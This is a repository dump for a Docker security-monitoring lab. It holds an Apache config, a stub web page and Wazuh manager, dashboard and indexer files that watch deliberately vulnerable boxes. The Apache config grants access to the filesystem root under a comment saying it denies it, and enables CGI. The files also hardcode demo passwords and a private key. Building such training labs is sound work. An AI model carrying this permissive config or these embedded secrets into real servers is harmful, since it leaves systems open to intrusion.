#LoadModule mime_magic_module modules/mod_mime_magic.so 134 | #LoadModule cern_meta_module modules/mod_cern_meta.so 135 | #LoadModule expires_module modules/mod_expires.so 136 | LoadModule headers_module modules/mod_headers.so 137 | #LoadModule ident_module modules/mod_ident.so 138 | #LoadModule usertrack_module modules/mod_usertrack.so 139 | #LoadModule unique_id_module modules/mod_unique_id.so 140 | LoadModule setenvif_module modules/mod_setenvif.so 141 | LoadModule version_module modules/mod_version.so 142 | #LoadModule remoteip_module modules/mod_remoteip.so 143 | #LoadModule proxy_module modules/mod_proxy.so 144 | #LoadModule proxy_connect_module modules/mod_proxy_connect.so 145 | #LoadModule proxy_ftp_module modules/mod_proxy_ftp.so 146 | #LoadModule proxy_http_module modules/mod_proxy_http.so 147 | #LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so 148 | #LoadModule proxy_scgi_module modules/mod_proxy_scgi.so 149 | #LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so 150 | #LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so 151 | #LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so 152 | #LoadModule proxy_ajp_module modules/mod_proxy_ajp.so 153 | #LoadModule proxy_balancer_module modules/mod_proxy_balancer.so 154 | #LoadModule proxy_express_module modules/mod_proxy_express.so 155 | #LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so 156 | #LoadModule session_module modules/mod_session.so 157 | #LoadModule session_cookie_module modules/mod_session_cookie.so 158 | #LoadModule session_crypto_module modules/mod_session_crypto.so 159 | #LoadModule session_dbd_module modules/mod_session_dbd.so 160 | #LoadModule slotmem_shm_module modules/mod_slotmem_shm.so 161 | #LoadModule slotmem_plain_module modules/mod_slotmem_plain.so 162 | #LoadModule ssl_module modules/mod_ssl.so 163 | #LoadModule optional_hook_export_module modules/mod_optional_hook_export.so 164 | #LoadModule optional_hook_import_module modules/mod_optional_hook_import.so 165 | #LoadModule optional_fn_import_module modules/mod_optional_fn_import.so 166 | #LoadModule optional_fn_export_module modules/mod_optional_fn_export.so 167 | #LoadModule dialup_module modules/mod_dialup.so 168 | #LoadModule http2_module modules/mod_http2.so 169 | #LoadModule proxy_http2_module modules/mod_proxy_http2.so 170 | #LoadModule md_module modules/mod_md.so 171 | #LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so 172 | #LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so 173 | #LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so 174 | #LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so 175 | LoadModule unixd_module modules/mod_unixd.so 176 | #LoadModule heartbeat_module modules/mod_heartbeat.so 177 | #LoadModule heartmonitor_module modules/mod_heartmonitor.so 178 | #LoadModule dav_module modules/mod_dav.so 179 | LoadModule status_module modules/mod_status.so 180 | LoadModule autoindex_module modules/mod_autoindex.so 181 | #LoadModule asis_module modules/mod_asis.so 182 | #LoadModule info_module modules/mod_info.so 183 | #LoadModule suexec_module modules/mod_suexec.so 184 | 185 | LoadModule cgid_module modules/mod_cgid.so 186 | 187 | 188 | LoadModule cgi_module modules/mod_cgi.so 189 | 190 | #LoadModule dav_fs_module modules/mod_dav_fs.so 191 | #LoadModule dav_lock_module modules/mod_dav_lock.so 192 | #LoadModule vhost_alias_module modules/mod_vhost_alias.so 193 | #LoadModule negotiation_module modules/mod_negotiation.so 194 | LoadModule dir_module modules/mod_dir.so 195 | #LoadModule imagemap_module modules/mod_imagemap.so 196 | #LoadModule actions_module modules/mod_actions.so 197 | #LoadModule speling_module modules/mod_speling.so 198 | #LoadModule userdir_module modules/mod_userdir.so 199 | LoadModule alias_module modules/mod_alias.so 200 | #LoadModule rewrite_module modules/mod_rewrite.so 201 | 202 | 203 | # 204 | # If you wish httpd to run as a different user or group, you must run 205 | # httpd as root initially and it will switch. 206 | # 207 | # User/Group: The name (or #number) of the user/group to run httpd as. 208 | # It is usually good practice to create a dedicated user and group for 209 | # running httpd, as with most system services. 210 | # 211 | User daemon 212 | Group daemon 213 | 214 | 215 | 216 | # 'Main' server configuration 217 | # 218 | # The directives in this section set up the values used by the 'main' 219 | # server, which responds to any requests that aren't handled by a 220 | # definition. These values also provide defaults for 221 | # any containers you may define later in the file. 222 | # 223 | # All of these directives may appear inside containers, 224 | # in which case these default settings will be overridden for the 225 | # virtual host being defined. 226 | # 227 | 228 | # 229 | # ServerAdmin: Your address, where problems with the server should be 230 | # e-mailed. This address appears on some server-generated pages, such 231 | # as error documents. e.g. admin@your-domain.com 232 | # 233 | ServerAdmin you@example.com 234 | 235 | # 236 | # ServerName gives the name and port that the server uses to identify itself. 237 | # This can often be determined automatically, but we recommend you specify 238 | # it explicitly to prevent problems during startup. 239 | # 240 | # If your host doesn't have a registered DNS name, enter its IP address here. 241 | # 242 | #ServerName www.example.com:80 243 | 244 | # 245 | # Deny access to the entirety of your server's filesystem. You must 246 | # explicitly permit access to web content directories in other 247 | # blocks below. 248 | # 249 | 250 | AllowOverride none 251 | Require all granted 252 | 253 | 254 | # 255 | # Note that from this point forward you must specifically allow 256 | # particular features to be enabled - so if something's not working as 257 | # you might expect, make sure that you have specifically enabled it 258 | # below. 259 | # 260 | 261 | # 262 | # DocumentRoot: The directory out of which you will serve your 263 | # documents. By default, all requests are taken from this directory, but 264 | # symbolic links and aliases may be used to point to other locations. 265 | # 266 | DocumentRoot "/usr/local/apache2/htdocs" 267 | 268 | # 269 | # Possible values for the Options directive are "None", "All", 270 | # or any combination of: 271 | # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews 272 | # 273 | # Note that "MultiViews" must be named *explicitly* --- "Options All" 274 | # doesn't give it to you. 275 | # 276 | # The Options directive is both complicated and important. Please see 277 | # http://httpd.apache.org/docs/2.4/mod/core.html#options 278 | # for more information. 279 | # 280 | Options Indexes FollowSymLinks 281 | 282 | # 283 | # AllowOverride controls what directives may be placed in .htaccess files. 284 | # It can be "All", "None", or any combination of the keywords: 285 | # AllowOverride FileInfo AuthConfig Limit 286 | # 287 | AllowOverride None 288 | 289 | # 290 | # Controls who can get stuff from this server. 291 | # 292 | Require all granted 293 | 294 | 295 | # 296 | # DirectoryIndex: sets the file that Apache will serve if a directory 297 | # is requested. 298 | # 299 | 300 | DirectoryIndex index.html 301 | 302 | 303 | # 304 | # The following lines prevent .htaccess and .htpasswd files from being 305 | # viewed by Web clients. 306 | # 307 | 308 | Require all denied 309 | 310 | 311 | # 312 | # ErrorLog: The location of the error log file. 313 | # If you do not specify an ErrorLog directive within a 314 | # container, error messages relating to that virtual host will be 315 | # logged here. If you *do* define an error logfile for a 316 | # container, that host's errors will be logged there and not here. 317 | # 318 | ErrorLog /proc/self/fd/2 319 | 320 | # 321 | # LogLevel: Control the number of messages logged to the error_log. 322 | # Possible values include: debug, info, notice, warn, error, crit, 323 | # alert, emerg. 324 | # 325 | LogLevel warn 326 | 327 | 328 | # 329 | # The following directives define some format nicknames for use with 330 | # a CustomLog directive (see below). 331 | # 332 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined 333 | LogFormat "%h %l %u %t \"%r\" %>s %b" common 334 | 335 | 336 | # You need to enable mod_logio.c to use %I and %O 337 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio 338 | 339 | 340 | # 341 | # The location and format of the access logfile (Common Logfile Format). 342 | # If you do not define any access logfiles within a 343 | # container, they will be logged here. Contrariwise, if you *do* 344 | # define per- access logfiles, transactions will be 345 | # logged therein and *not* in this file. 346 | # 347 | CustomLog /proc/self/fd/1 common 348 | 349 | # 350 | # If you prefer a logfile with access, agent, and referer information 351 | # (Combined Logfile Format) you can use the following directive. 352 | # 353 | #CustomLog "logs/access_log" combined 354 | 355 | 356 | 357 | # 358 | # Redirect: Allows you to tell clients about documents that used to 359 | # exist in your server's namespace, but do not anymore. The client 360 | # will make a new request for the document at its new location. 361 | # Example: 362 | # Redirect permanent /foo http://www.example.com/bar 363 | 364 | # 365 | # Alias: Maps web paths into filesystem paths and is used to 366 | # access content that does not live under the DocumentRoot. 367 | # Example: 368 | # Alias /webpath /full/filesystem/path 369 | # 370 | # If you include a trailing / on /webpath then the server will 371 | # require it to be present in the URL. You will also likely 372 | # need to provide a section to allow access to 373 | # the filesystem path. 374 | 375 | # 376 | # ScriptAlias: This controls which directories contain server scripts. 377 | # ScriptAliases are essentially the same as Aliases, except that 378 | # documents in the target directory are treated as applications and 379 | # run by the server when requested rather than as documents sent to the 380 | # client. The same rules about trailing "/" apply to ScriptAlias 381 | # directives as to Alias. 382 | # 383 | ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/" 384 | 385 | 386 | 387 | 388 | # 389 | # ScriptSock: On threaded servers, designate the path to the UNIX 390 | # socket used to communicate with the CGI daemon of mod_cgid. 391 | # 392 | #Scriptsock cgisock 393 | 394 | 395 | # 396 | # "/usr/local/apache2/cgi-bin" should be changed to whatever your ScriptAliased 397 | # CGI directory exists, if you have that configured. 398 | # 399 | 400 | AllowOverride None 401 | Options None 402 | Require all granted 403 | 404 | 405 | 406 | # 407 | # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied 408 | # backend servers which have lingering "httpoxy" defects. 409 | # 'Proxy' request header is undefined by the IETF, not listed by IANA 410 | # 411 | RequestHeader unset Proxy early 412 | 413 | 414 | 415 | # 416 | # TypesConfig points to the file containing the list of mappings from 417 | # filename extension to MIME-type. 418 | # 419 | TypesConfig conf/mime.types 420 | 421 | # 422 | # AddType allows you to add to or override the MIME configuration 423 | # file specified in TypesConfig for specific file types. 424 | # 425 | #AddType application/x-gzip .tgz 426 | # 427 | # AddEncoding allows you to have certain browsers uncompress 428 | # information on the fly. Note: Not all browsers support this. 429 | # 430 | #AddEncoding x-compress .Z 431 | #AddEncoding x-gzip .gz .tgz 432 | # 433 | # If the AddEncoding directives above are commented-out, then you 434 | # probably should define those extensions to indicate media types: 435 | # 436 | AddType application/x-compress .Z 437 | AddType application/x-gzip .gz .tgz 438 | 439 | # 440 | # AddHandler allows you to map certain file extensions to "handlers": 441 | # actions unrelated to filetype. These can be either built into the server 442 | # or added with the Action directive (see below) 443 | # 444 | # To use CGI scripts outside of ScriptAliased directories: 445 | # (You will also need to add "ExecCGI" to the "Options" directive.) 446 | # 447 | #AddHandler cgi-script .cgi 448 | 449 | # For type maps (negotiated resources): 450 | #AddHandler type-map var 451 | 452 | # 453 | # Filters allow you to process content before it is sent to the client. 454 | # 455 | # To parse .shtml files for server-side includes (SSI): 456 | # (You will also need to add "Includes" to the "Options" directive.) 457 | # 458 | #AddType text/html .shtml 459 | #AddOutputFilter INCLUDES .shtml 460 | 461 | 462 | # 463 | # The mod_mime_magic module allows the server to use various hints from the 464 | # contents of the file itself to determine its type. The MIMEMagicFile 465 | # directive tells the module where the hint definitions are located. 466 | # 467 | #MIMEMagicFile conf/magic 468 | 469 | # 470 | # Customizable error responses come in three flavors: 471 | # 1) plain text 2) local redirects 3) external redirects 472 | # 473 | # Some examples: 474 | #ErrorDocument 500 "The server made a boo boo." 475 | #ErrorDocument 404 /missing.html 476 | #ErrorDocument 404 "/cgi-bin/missing_handler.pl" 477 | #ErrorDocument 402 http://www.example.com/subscription_info.html 478 | # 479 | 480 | # 481 | # MaxRanges: Maximum number of Ranges in a request before 482 | # returning the entire resource, or one of the special 483 | # values 'default', 'none' or 'unlimited'. 484 | # Default setting is to accept 200 Ranges. 485 | #MaxRanges unlimited 486 | 487 | # 488 | # EnableMMAP and EnableSendfile: On systems that support it, 489 | # memory-mapping or the sendfile syscall may be used to deliver 490 | # files. This usually improves server performance, but must 491 | # be turned off when serving from networked-mounted 492 | # filesystems or if support for these functions is otherwise 493 | # broken on your system. 494 | # Defaults: EnableMMAP On, EnableSendfile Off 495 | # 496 | #EnableMMAP off 497 | #EnableSendfile on 498 | 499 | # Supplemental configuration 500 | # 501 | # The configuration files in the conf/extra/ directory can be 502 | # included to add extra features or to modify the default configuration of 503 | # the server, or you may simply copy their contents here and change as 504 | # necessary. 505 | 506 | # Server-pool management (MPM specific) 507 | #Include conf/extra/httpd-mpm.conf 508 | 509 | # Multi-language error messages 510 | #Include conf/extra/httpd-multilang-errordoc.conf 511 | 512 | # Fancy directory listings 513 | #Include conf/extra/httpd-autoindex.conf 514 | 515 | # Language settings 516 | #Include conf/extra/httpd-languages.conf 517 | 518 | # User home directories 519 | #Include conf/extra/httpd-userdir.conf 520 | 521 | # Real-time info on requests and configuration 522 | #Include conf/extra/httpd-info.conf 523 | 524 | # Virtual hosts 525 | #Include conf/extra/httpd-vhosts.conf 526 | 527 | # Local access to the Apache HTTP Server Manual 528 | #Include conf/extra/httpd-manual.conf 529 | 530 | # Distributed authoring and versioning (WebDAV) 531 | #Include conf/extra/httpd-dav.conf 532 | 533 | # Various default settings 534 | #Include conf/extra/httpd-default.conf 535 | 536 | # Configure mod_proxy_html to understand HTML4/XHTML1 537 | 538 | Include conf/extra/proxy-html.conf 539 | 540 | 541 | # Secure (SSL/TLS) connections 542 | #Include conf/extra/httpd-ssl.conf 543 | # 544 | # Note: The following must must be present to support 545 | # starting without SSL on platforms with no /dev/random equivalent 546 | # but a statically compiled-in mod_ssl. 547 | # 548 | 549 | SSLRandomSeed startup builtin 550 | SSLRandomSeed connect builtin 551 | -------------------------------------------------------------------------------- /travesty/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 |

Time Zone:

5 | 6 | 9 |
10 | 11 | -------------------------------------------------------------------------------- /wazuh/README.md: -------------------------------------------------------------------------------- 1 | # BlueBot 2 | 3 | # Wazuh 4 | A Dockerized lab implementation of Wazuh open source security monitoring and file integrity monitoring. Several agents are installed on several of the vulnerable lab boxes. 5 | 6 | # Example Setup 7 | 1. From host, run 8 | ``` 9 | docker-compose up -d wazuh.manager wazuh.indexer wazuh.dashboard knasty --build 10 | ``` 11 | 2. On host, wait navigate to `https://localhost/` and login with `admin:SecretPassword`. Check that the Agent is connected and Active. 12 | 3. Hack a bit on `http://localhost:1017/` and watch the Wazuh Dashboard 13 | 14 | # References 15 | 1. [OSSEC demo](https://www.youtube.com/watch?v=7c8xowHz0Ko) 16 | 2. [Wazuh demo](https://www.youtube.com/watch?v=vJZAVZOIpfA&t=1053s) 17 | 3. [Troubleshooting Wazuh Agents](https://documentation.wazuh.com/current/user-manual/agent-enrollment/troubleshooting.html) 18 | 4. [Removing duplicate Agents](https://documentation.wazuh.com/current/user-manual/agents/remove-agents/remove.html) -------------------------------------------------------------------------------- /wazuh/config/certs.yml: -------------------------------------------------------------------------------- 1 | nodes: 2 | # Wazuh indexer server nodes 3 | indexer: 4 | - name: wazuh.indexer 5 | ip: wazuh.indexer 6 | 7 | # Wazuh server nodes 8 | # Use node_type only with more than one Wazuh manager 9 | server: 10 | - name: wazuh.manager 11 | ip: wazuh.manager 12 | 13 | # Wazuh dashboard node 14 | dashboard: 15 | - name: wazuh.dashboard 16 | ip: wazuh.dashboard 17 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_cluster/wazuh_manager.conf: -------------------------------------------------------------------------------- 1 | 2 | 3 | yes 4 | yes 5 | no 6 | no 7 | no 8 | smtp.example.wazuh.com 9 | wazuh@example.wazuh.com 10 | recipient@example.wazuh.com 11 | 12 12 | alerts.log 13 | 10m 14 | 0 15 | 16 | 17 | 18 | 3 19 | 12 20 | 21 | 22 | 23 | 24 | plain 25 | 26 | 27 | 28 | secure 29 | 1514 30 | tcp 31 | 131072 32 | 33 | 34 | 35 | 36 | no 37 | yes 38 | yes 39 | yes 40 | yes 41 | yes 42 | yes 43 | yes 44 | 45 | 46 | 43200 47 | 48 | etc/rootcheck/rootkit_files.txt 49 | etc/rootcheck/rootkit_trojans.txt 50 | 51 | yes 52 | 53 | 54 | 55 | yes 56 | 1800 57 | 1d 58 | yes 59 | 60 | wodles/java 61 | wodles/ciscat 62 | 63 | 64 | 65 | 66 | yes 67 | yes 68 | /var/log/osquery/osqueryd.results.log 69 | /etc/osquery/osquery.conf 70 | yes 71 | 72 | 73 | 74 | 75 | no 76 | 1h 77 | yes 78 | yes 79 | yes 80 | yes 81 | yes 82 | yes 83 | yes 84 | 85 | 86 | 87 | 10 88 | 89 | 90 | 91 | 92 | yes 93 | yes 94 | 12h 95 | yes 96 | 97 | 98 | 99 | no 100 | 5m 101 | 6h 102 | yes 103 | 104 | 105 | 106 | no 107 | trusty 108 | xenial 109 | bionic 110 | focal 111 | 1h 112 | 113 | 114 | 115 | 116 | no 117 | stretch 118 | buster 119 | bullseye 120 | 1h 121 | 122 | 123 | 124 | 125 | no 126 | 5 127 | 6 128 | 7 129 | 8 130 | 1h 131 | 132 | 133 | 134 | 135 | no 136 | amazon-linux 137 | amazon-linux-2 138 | 1h 139 | 140 | 141 | 142 | 143 | no 144 | 1h 145 | 146 | 147 | 148 | 149 | yes 150 | 1h 151 | 152 | 153 | 154 | 155 | yes 156 | 2010 157 | 1h 158 | 159 | 160 | 161 | 162 | 163 | 164 | no 165 | 166 | 167 | 43200 168 | 169 | yes 170 | 171 | 172 | yes 173 | 174 | 175 | no 176 | 177 | 178 | /etc,/usr/bin,/usr/sbin 179 | /bin,/sbin,/boot 180 | 181 | 182 | /etc/mtab 183 | /etc/hosts.deny 184 | /etc/mail/statistics 185 | /etc/random-seed 186 | /etc/random.seed 187 | /etc/adjtime 188 | /etc/httpd/logs 189 | /etc/utmpx 190 | /etc/wtmpx 191 | /etc/cups/certs 192 | /etc/dumpdates 193 | /etc/svc/volatile 194 | 195 | 196 | .log$|.swp$ 197 | 198 | 199 | /etc/ssl/private.key 200 | 201 | yes 202 | yes 203 | yes 204 | yes 205 | 206 | 207 | 10 208 | 209 | 210 | 100 211 | 212 | 213 | 214 | yes 215 | 5m 216 | 1h 217 | 10 218 | 219 | 220 | 221 | 222 | 223 | 127.0.0.1 224 | ^localhost.localdomain$ 225 | 226 | 227 | 228 | disable-account 229 | disable-account 230 | yes 231 | 232 | 233 | 234 | restart-wazuh 235 | restart-wazuh 236 | 237 | 238 | 239 | firewall-drop 240 | firewall-drop 241 | yes 242 | 243 | 244 | 245 | host-deny 246 | host-deny 247 | yes 248 | 249 | 250 | 251 | route-null 252 | route-null 253 | yes 254 | 255 | 256 | 257 | win_route-null 258 | route-null.exe 259 | yes 260 | 261 | 262 | 263 | netsh 264 | netsh.exe 265 | yes 266 | 267 | 268 | 273 | 274 | 275 | 276 | command 277 | df -P 278 | 360 279 | 280 | 281 | 282 | full_command 283 | netstat -tulpn | sed 's/\([[:alnum:]]\+\)\ \+[[:digit:]]\+\ \+[[:digit:]]\+\ \+\(.*\):\([[:digit:]]*\)\ \+\([0-9\.\:\*]\+\).\+\ \([[:digit:]]*\/[[:alnum:]\-]*\).*/\1 \2 == \3 == \4 \5/' | sort -k 4 -g | sed 's/ == \(.*\) ==/:\1/' | sed 1,2d 284 | netstat listening ports 285 | 360 286 | 287 | 288 | 289 | full_command 290 | last -n 20 291 | 360 292 | 293 | 294 | 295 | 296 | ruleset/decoders 297 | ruleset/rules 298 | 0215-policy_rules.xml 299 | etc/lists/audit-keys 300 | etc/lists/amazon/aws-eventnames 301 | etc/lists/security-eventchannel 302 | 303 | 304 | etc/decoders 305 | etc/rules 306 | 307 | 308 | 309 | yes 310 | 1 311 | 64 312 | 15m 313 | 314 | 315 | 316 | 317 | no 318 | 1515 319 | no 320 | yes 321 | no 322 | HIGH:!ADH:!EXP:!MD5:!RC4:!3DES:!CAMELLIA:@STRENGTH 323 | 324 | no 325 | etc/sslmanager.cert 326 | etc/sslmanager.key 327 | no 328 | 329 | 330 | 331 | wazuh 332 | node01 333 | master 334 | aa093264ef885029653eea20dfcf51ae 335 | 1516 336 | 0.0.0.0 337 | 338 | wazuh.manager 339 | 340 | no 341 | yes 342 | 343 | 344 | 345 | 346 | 347 | 348 | syslog 349 | /var/ossec/logs/active-responses.log 350 | 351 | 352 | 353 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_dashboard/opensearch_dashboards.yml: -------------------------------------------------------------------------------- 1 | server.host: 0.0.0.0 2 | server.port: 5601 3 | opensearch.hosts: https://wazuh.indexer:9200 4 | opensearch.ssl.verificationMode: certificate 5 | opensearch.requestHeadersWhitelist: ["securitytenant","Authorization"] 6 | opensearch_security.multitenancy.enabled: false 7 | opensearch_security.readonly_mode.roles: ["kibana_read_only"] 8 | server.ssl.enabled: true 9 | server.ssl.key: "/usr/share/wazuh-dashboard/certs/wazuh-dashboard-key.pem" 10 | server.ssl.certificate: "/usr/share/wazuh-dashboard/certs/wazuh-dashboard.pem" 11 | opensearch.ssl.certificateAuthorities: ["/usr/share/wazuh-dashboard/certs/root-ca.pem"] 12 | uiSettings.overrides.defaultRoute: /app/wazuh 13 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_dashboard/wazuh.yml: -------------------------------------------------------------------------------- 1 | hosts: 2 | - 1513629884013: 3 | url: "https://wazuh.manager" 4 | port: 55000 5 | username: wazuh-wui 6 | password: "MyS3cr37P450r.*-" 7 | run_as: false 8 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer/internal_users.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # This is the internal user database 3 | # The hash value is a bcrypt hash and can be generated with plugin/tools/hash.sh 4 | 5 | _meta: 6 | type: "internalusers" 7 | config_version: 2 8 | 9 | # Define your internal users here 10 | 11 | ## Demo users 12 | 13 | admin: 14 | hash: "$2y$12$K/SpwjtB.wOHJ/Nc6GVRDuc1h0rM1DfvziFRNPtk27P.c4yDr9njO" 15 | reserved: true 16 | backend_roles: 17 | - "admin" 18 | description: "Demo admin user" 19 | 20 | kibanaserver: 21 | hash: "$2a$12$4AcgAt3xwOWadA5s5blL6ev39OXDNhmOesEoo33eZtrq2N0YrU3H." 22 | reserved: true 23 | description: "Demo kibanaserver user" 24 | 25 | kibanaro: 26 | hash: "$2a$12$JJSXNfTowz7Uu5ttXfeYpeYE0arACvcwlPBStB1F.MI7f0U9Z4DGC" 27 | reserved: false 28 | backend_roles: 29 | - "kibanauser" 30 | - "readall" 31 | attributes: 32 | attribute1: "value1" 33 | attribute2: "value2" 34 | attribute3: "value3" 35 | description: "Demo kibanaro user" 36 | 37 | logstash: 38 | hash: "$2a$12$u1ShR4l4uBS3Uv59Pa2y5.1uQuZBrZtmNfqB3iM/.jL0XoV9sghS2" 39 | reserved: false 40 | backend_roles: 41 | - "logstash" 42 | description: "Demo logstash user" 43 | 44 | readall: 45 | hash: "$2a$12$ae4ycwzwvLtZxwZ82RmiEunBbIPiAmGZduBAjKN0TXdwQFtCwARz2" 46 | reserved: false 47 | backend_roles: 48 | - "readall" 49 | description: "Demo readall user" 50 | 51 | snapshotrestore: 52 | hash: "$2y$12$DpwmetHKwgYnorbgdvORCenv4NAK8cPUg8AI6pxLCuWf/ALc0.v7W" 53 | reserved: false 54 | backend_roles: 55 | - "snapshotrestore" 56 | description: "Demo snapshotrestore user" 57 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer/wazuh.indexer.yml: -------------------------------------------------------------------------------- 1 | network.host: "0.0.0.0" 2 | node.name: "wazuh.indexer" 3 | path.data: /var/lib/wazuh-indexer 4 | path.logs: /var/log/wazuh-indexer 5 | discovery.type: single-node 6 | http.port: 9200-9299 7 | transport.tcp.port: 9300-9399 8 | compatibility.override_main_response_version: true 9 | plugins.security.ssl.http.pemcert_filepath: /usr/share/wazuh-indexer/certs/wazuh.indexer.pem 10 | plugins.security.ssl.http.pemkey_filepath: /usr/share/wazuh-indexer/certs/wazuh.indexer.key 11 | plugins.security.ssl.http.pemtrustedcas_filepath: /usr/share/wazuh-indexer/certs/root-ca.pem 12 | plugins.security.ssl.transport.pemcert_filepath: /usr/share/wazuh-indexer/certs/wazuh.indexer.pem 13 | plugins.security.ssl.transport.pemkey_filepath: /usr/share/wazuh-indexer/certs/wazuh.indexer.key 14 | plugins.security.ssl.transport.pemtrustedcas_filepath: /usr/share/wazuh-indexer/certs/root-ca.pem 15 | plugins.security.ssl.http.enabled: true 16 | plugins.security.ssl.transport.enforce_hostname_verification: false 17 | plugins.security.ssl.transport.resolve_hostname: false 18 | plugins.security.authcz.admin_dn: 19 | - "CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US" 20 | plugins.security.check_snapshot_restore_write_privileges: true 21 | plugins.security.enable_snapshot_restore_privilege: true 22 | plugins.security.nodes_dn: 23 | - "CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California,C=US" 24 | plugins.security.restapi.roles_enabled: 25 | - "all_access" 26 | - "security_rest_api_access" 27 | plugins.security.system_indices.enabled: true 28 | plugins.security.system_indices.indices: [".opendistro-alerting-config", ".opendistro-alerting-alert*", ".opendistro-anomaly-results*", ".opendistro-anomaly-detector*", ".opendistro-anomaly-checkpoints", ".opendistro-anomaly-detection-state", ".opendistro-reports-*", ".opendistro-notifications-*", ".opendistro-notebooks", ".opensearch-observability", ".opendistro-asynchronous-search-response*", ".replication-metadata-store"] 29 | plugins.security.allow_default_init_securityindex: true 30 | cluster.routing.allocation.disk.threshold_enabled: false -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/admin-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDO+Wv7AtCh/T4M 3 | NF1sczj68CE+6D7HZ+5yGjOFQ932nPFzL1R/kqoc8AU4lReJGbYeKFkrzD5W+B3y 4 | UJT0vXoTDoq+qARb5WwPC9A8X8pOlubCjcy3zXkwRhUJ6mJG4REAgPCP+X3NxsyJ 5 | UP1Bq0OSe4fEbSfmkcq4WLG7bkLmBJNlaXZl+JAsBKVoSeFpL2EyUq4QnLWFuyF5 6 | 1TLVOFWhNfy+OTJ/ioKw3RId0WbjkdgyP1G8h8UUn2Ztkt4FGyNRa+KZq9CiqXHO 7 | HrT3OaT6tlzQf+3CsLqG4E1Dk5zG3fr4QyLXyk1y3KnsEGSC+AoYkFR0g0zJ6d9G 8 | L+Aqi1LVAgMBAAECggEAROg/bfta8IN6c9+/NssJrmnh96qktAjDFxPoETcuH9vS 9 | exHH5Q00O5whcNwaUNfRjSrLvUwreRL0DWeMoAqxKMUPpjgT83BnUH8TXfZaSV3u 10 | B9njzVHIRi0e9gUloQlveqZy8MwUeTz1fcYL+yAEyDD+W4Qn45ioUEWfLpKgDSng 11 | 2D9AcQIk7J1MNUt9cGos4jJJYgqBZqZ1yK0/CxohOWpmzk5KS5E8J46ocOaoYCyd 12 | MvEEwU6EhmgjtQpd25BCwPVlV8SLmYOyUqgEOPuUioqcb4doLxxIyD/5cLCnm2EI 13 | enpo7KsYBkSVEw+dX0CMNf+pit29mdrIE63wWNKBpQKBgQD9gdIuyht6lGjK+fl1 14 | 8ozlRSdr9e7jJtAFAkuZI4oLZlLSR+gwryoSkdwZDUYJVm43ASlij2xdmpSwKbJm 15 | OoWzzKQ7c5lgiExeh0SN4IVszLV3fv+zXkNBrj+t9qrKPmW/li2bzK/FNYobkJ7P 16 | Y9TnY+IncgQjC9xRcVGi6m4b6wKBgQDRAnWEH8IHcfeSRERZiWNtkp/OVPgk+vGt 17 | MMmtTrA42OMLwrhL4ql9f8FkcwF0KZ7zILQ57zN7aWuW0aH90ScbhTNVeWB7FZK1 18 | UMw0JbxzJdXrH99inknsMp8fxI92ENVkj0HNf5xuPzdR7N1kF2f9kJRqb94QoIRK 19 | rcMfzb5cPwKBgQDqAvnTqUueZvspS4HFKCZ5ydFvLnHbi8uApDLG5XCbv1P6utgS 20 | gM+0nqJvGbqqCffpnI/oZH7jFTvmNkdxaNpdNC3yl25hFtBwfiuBUF26JmnpKfm+ 21 | SOiK69/qpYXY9aqVJXtqk5M514dqlKCUzxIMmz57rRs2gs9Y+uMiIYeNCwKBgQCo 22 | F6UxXGUsnbCw9qxNohvPzMMvKtDi1Ns3IWyhMA6zuWJoW/LiPOl44B1FzuRVav/F 23 | owCvMzwhPbhkdDYmrmYYUPjm/hXlB4WUwuVn7w1vQfeYAGskog7rog6teuSx3Hny 24 | RPBz9/R0Ce1QuwGWdOiSWguyykM69g1PDg5Gbq5w+wKBgCtxdEuVu9JsVm4uc2Lh 25 | 1ZB+ukUlJrMX9LLc1VuUhM5MZHWWVWLEP87KgiDmMVq1UXuxJE4cfcVCcgBjKrXo 26 | OVNDnrO7i/mIBNW4VXlSpcFIOKfOauYAxblBdhzGUHTC3tEnnY12UJdzsAAqpMWN 27 | dF3fKsxGEIXYveR+weIcB1OX 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/admin.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDDjCCAfYCFATr5Hq6V9R7mC9s9axgozOmbBMyMA0GCSqGSIb3DQEBCwUAMDUx 3 | DjAMBgNVBAsMBVdhenVoMQ4wDAYDVQQKDAVXYXp1aDETMBEGA1UEBwwKQ2FsaWZv 4 | cm5pYTAeFw0yMzA0MjUxNTQ1NThaFw0zMzA0MjIxNTQ1NThaMFIxCzAJBgNVBAYT 5 | AlVTMRMwEQYDVQQHDApDYWxpZm9ybmlhMQ4wDAYDVQQKDAVXYXp1aDEOMAwGA1UE 6 | CwwFV2F6dWgxDjAMBgNVBAMMBWFkbWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A 7 | MIIBCgKCAQEAzvlr+wLQof0+DDRdbHM4+vAhPug+x2fuchozhUPd9pzxcy9Uf5Kq 8 | 